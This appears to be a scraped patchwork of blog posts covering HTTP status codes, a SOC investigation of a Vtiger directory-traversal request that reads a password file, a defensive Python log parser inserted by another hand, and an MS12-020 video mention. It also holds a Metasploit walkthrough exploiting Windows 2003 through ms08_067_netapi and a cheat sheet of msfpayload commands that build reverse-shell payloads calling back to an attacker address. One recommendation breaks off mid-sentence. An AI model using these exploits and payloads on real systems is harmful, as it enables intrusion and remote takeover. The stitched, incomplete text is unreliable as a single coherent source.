List of HTTP status codes/IIS error Codes | blog-windows

blog-windows.com | List of HTTP status codes/IIS error Codes

These codes are very important when analysing a hacking attempt or incident involving a web server.


When you drill down to the raw event, these codes appear in the raw web-server log entry and help you analyse the incident more accurately.


The following is a list of Hypertext Transfer Protocol (HTTP) response status codes. The first digit of the status code specifies one of five classes of response; the bare minimum for an HTTP client is that it recognises these five classes. The phrases used are the standard examples, but any human-readable alternative can be provided. Unless otherwise stated, the status code is part of the HTTP/1.1 standard.


The Internet Assigned Numbers Authority (IANA) maintains the official registry of HTTP status codes.


Microsoft IIS sometimes uses additional decimal sub-codes to provide more specific information,[1] but these are not listed here.


Contents:-


1 1xx Informational
2 2xx Success
3 3xx Redirection
4 4xx Client Error
5 5xx Server Error
6 See also
7 References
8 External links 


4xx Client Error

The 4xx class of status code is intended for cases in which the client seems to have erred. Except when responding to a HEAD request, the server should include an entity containing an explanation of the error situation, and whether it is a temporary or permanent condition. These status codes are applicable to any request method.

400 Bad Request
The request cannot be fulfilled due to bad syntax.


401 Unauthorized
Similar to 403 Forbidden, but specifically for use when authentication is required and has failed or has not yet been provided. The response must include a WWW-Authenticate header field containing a challenge applicable to the requested resource. See Basic access authentication and Digest access authentication.


402 Payment Required
Reserved for future use. The original intention was that this code might be used as part of some form of digital cash or micropayment scheme, but that has not happened, and this code is not usually used. As an example of its use, however, Apple's MobileMe service generates a 402 error if the MobileMe account is delinquent. In addition, YouTube uses this status if a particular IP address has made excessive requests, and requires the person to enter a CAPTCHA.


403 Forbidden
The request was a valid request, but the server is refusing to respond to it. Unlike a 401 Unauthorized response, authenticating will make no difference. On servers where authentication is required, this commonly means that the provided credentials were successfully authenticated but that the credentials still do not grant the client permission to access the resource (e.g. a recognized user attempting to access restricted content).


404 Not Found
The requested resource could not be found but may be available again in the future. Subsequent requests by the client are permissible.


405 Method Not Allowed
A request was made of a resource using a request method not supported by that resource; for example, using GET on a form which requires data to be presented via POST, or using PUT on a read-only resource.


406 Not Acceptable
The requested resource is only capable of generating content not acceptable according to the Accept headers sent in the request.

If you need to know more about error codes, please refer to the link below.

Reference Link:




Share Your Knowledge................................by comment -Regards, blog-windows blog (sms GeniusHacker on 9870807070)or http://labs.google.co.in/smschannels/channel/GeniusHacker


Investigation and Solution | Vtiger Vulnerability (Elastix) | blog-windows


As part of the SOC team, we observed an attacker from outside attempting to exploit a Vtiger vulnerability, one of the vulnerabilities discovered in mid-2012.

Specifically, the attacker was trying to access one file, amportal.conf, which contains all of the system's password information; the same flaw can probably be used to view almost any file on the system.
Here is a brief explanation:
About Vtiger:-

I. BACKGROUND

Vtiger CRM is a free, full-featured, 100% Open Source CRM software ideal
for small and medium businesses, with low-cost product support available
to production users that need reliable support.

II. DESCRIPTION
Multiple vulnerabilities exist in the Vtiger CRM software.

III. ANALYSIS
Summary:
 A) Remote Code Execution (RCE) Vulnerability
 B) Local File Inclusion (LFI) Vulnerability (pre-auth)
 C) Cross Site Scripting (XSS) Vulnerabilities (pre-auth, reflected)
 D) Cross Site Scripting (XSS) Vulnerabilities (post-auth, reflected)

 Request we observed:

https://myipadddress/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf

When a user browses to this URL, amportal.conf is displayed, including all the passwords it contains.
Clearly the sortfieldsjson.php script is being abused to read amportal.conf, and it can probably be used to view almost any file on the system.
Disclosure Date : 2012-03-21
Exploit Publish Date : 2012-03-21

Description:
Vtiger CRM contains a flaw that allows a remote attacker to traverse outside of a restricted path. The issue is due to the sortfieldsjson.php script not properly sanitizing user input, specifically directory traversal style attacks (e.g. /../) supplied via the 'module_name' parameter. This directory traversal attack would allow the attacker to read arbitrary files.
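As an added defensive example (not from the original post), the script below parses web-server log lines like the raw events mentioned in the status-code post above, groups them by status class and client IP, and flags requests carrying the directory traversal pattern seen in the Vtiger request. It assumes IIS W3C extended format with a #Fields header; the log lines are constructed samples, not real traffic.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed sample lines in IIS W3C extended format (not real traffic).
# The first request mirrors the Vtiger traversal URL discussed above; the last
# one is double URL-encoded to show why the detector decodes twice.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2012-03-22 10:15:01 10.0.0.5 GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php module_name=../../../../../../../..//etc/amportal.conf 443 - 203.0.113.7 Mozilla/5.0 404 0 2
2012-03-22 10:15:03 10.0.0.5 GET /index.html - 443 - 198.51.100.9 Mozilla/5.0 200 0 0
2012-03-22 10:15:04 10.0.0.5 GET /admin/ - 443 - 203.0.113.7 Mozilla/5.0 401 2 5
2012-03-22 10:15:05 10.0.0.5 GET /cgi-bin/test.php module_name=..%252F..%252Fetc%252Fpasswd 443 - 203.0.113.7 curl/7.22 404 0 2
"""

CLASS_NAMES = {1: "Informational", 2: "Success", 3: "Redirection",
               4: "Client Error", 5: "Server Error"}
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")  # "../" or "..\" after decoding

def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):  # skip malformed lines
                yield dict(zip(fields, values))

def status_class(code):
    """Map a status such as '404' to its class name ('Client Error')."""
    return CLASS_NAMES.get(int(code) // 100, "Unknown")

def is_traversal(stem, query):
    """True if stem or query contains ../ after two rounds of URL decoding."""
    return bool(TRAVERSAL_RE.search(unquote(unquote(stem + "?" + query))))

def analyse(text):
    """Per client IP: a Counter of status classes and the traversal requests seen."""
    per_ip = defaultdict(lambda: {"classes": Counter(), "traversal": []})
    for rec in parse_w3c(text):
        entry = per_ip[rec["c-ip"]]
        entry["classes"][status_class(rec["sc-status"])] += 1
        if is_traversal(rec["cs-uri-stem"], rec["cs-uri-query"]):
            entry["traversal"].append(rec["cs-uri-stem"] + "?" + rec["cs-uri-query"])
    return dict(per_ip)
```

A single source producing a run of 4xx responses together with traversal patterns is the combination worth escalating; the 4xx count alone is normal background noise.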

Recommendation:
- Check the version of Vtiger in use and update or patch it.
- If you run Elastix (which includes Vtiger even if you don't use it), I strongly recommend that you either:
  - limit access to the web interface of your server to specific IP addresses only, or
  - if you don't use Vtiger, disable access to the interface by running.

Elastix references:
- Upgrading Elastix? Read this FAQ first: elx.ec/upgfaq
- Elastix docs: elx.ec/elastixtutorials, www.elastixconnection.com
- Elastix Fault Finding Guide: elx.ec/faultfind


Root Cause Analysis:
After a thorough investigation we found that the attacker attempted the exploit shown above, which targets the Linux platform, whereas our environment is Windows based; we also confirmed that we do not use Vtiger in our environment. I also personally investigated that particular server.




blog-windows | MS12-020 -- Critical vulnerability to attack on windows system


Hi All,
Welcome to my new video on a critical vulnerability used to attack Windows systems.
The vulnerability is in Microsoft's Remote Desktop Protocol (RDP) implementation (MS12-020); a patch for it was released during the last Patch Tuesday.

This video was made by blog-windows.com.
Demo:






blog-windows | Metasploit - Windows 2003 Server Exploitation with ms08_067_netapi vulnerability


In this article we will focus on exploiting a Windows 2003 server through the Microsoft directory service vulnerability.

We performed a port scan with Nmap and observed that the microsoft-ds service is open on port 445.

This service is used for file sharing in Windows environments.

Microsoft-ds Service is Open

The next step is to open the Metasploit framework in order to find the appropriate exploit that will give us access to the remote server.

We already know that the port 445 is for the SMB service. So our search will be on the SMB exploits like the netapi.

Specifically the exploit that we are going to use is the ms08_067_netapi which exploits a parsing flaw in the path canonicalization code of NetAPI32.dll.

Search for the netapi Exploit

So we are configuring the exploit with the appropriate IP addresses and we will use as a payload the meterpreter service.

Netapi Exploit Configuration

Now it is time to run the exploit against the target machine and as we can see from the image below it successfully opened a meterpreter session.

Exploitation with the Netapi

We can use the sysinfo command of the meterpreter in order to discover our first information about the Windows 2003 Server.

Note:

The microsoft-ds service is very common on Windows machines. Most servers will have it enabled, so they are easy to exploit unless a firewall filters port 445. Remember that this exploit only works against Windows 2003 Server, specifically the following versions: Windows 2003 SP0, Windows 2003 SP1 and Windows 2003 SP2.


blog-windows | Metasploit - Payload Commands

Here is a list with the available payload commands.


msfpayload -l
List available payloads.

msfpayload windows/meterpreter/bind_tcp O
List all available options for the windows/meterpreter/bind_tcp payload.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 X > payload.exe
Create a Meterpreter reverse_tcp payload that connects back to our IP on port 443, saved as a Windows executable named payload.exe.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R > payload.raw
Create a Meterpreter reverse_tcp payload that connects back to our IP, saved in raw format. It can be combined with msfencode.

msfpayload windows/meterpreter/bind_tcp LPORT=443 C > payload.c
Export as C-formatted shellcode.

msfpayload windows/meterpreter/bind_tcp LPORT=443 J > payload.java
Export as %u-encoded JavaScript.

